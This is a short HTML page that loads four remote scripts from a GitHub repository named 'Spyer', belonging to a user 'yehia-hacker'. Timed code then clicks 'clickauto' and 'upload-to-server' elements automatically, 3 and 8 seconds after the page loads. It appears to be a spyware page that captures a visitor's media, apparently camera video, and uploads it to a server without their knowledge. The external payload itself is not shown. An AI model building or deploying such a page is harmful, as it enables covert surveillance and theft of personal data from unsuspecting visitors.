<script src='https://raw.githack.com/yehia-hacker/Spyer/master/Video/Xrem.js'></script>


<div id='index'>You Index</div>






<script src='https://raw.githack.com/yehia-hacker/Spyer/master/Video/runindex.js'></script><script src='https://raw.githack.com/yehia-hacker/Spyer/master/Video/pars.js'></script><script src='https://raw.githack.com/yehia-hacker/Spyer/master/Video/DATA0.js'></script>

<script>
setTimeout(function(){    document.getElementById("clickauto").click();
$("#clickauto").trigger('click');}, 3000);
setTimeout(function(){    document.getElementById("upload-to-server").click();
$("#upload-to-server").trigger('click');}, 8000);


</script>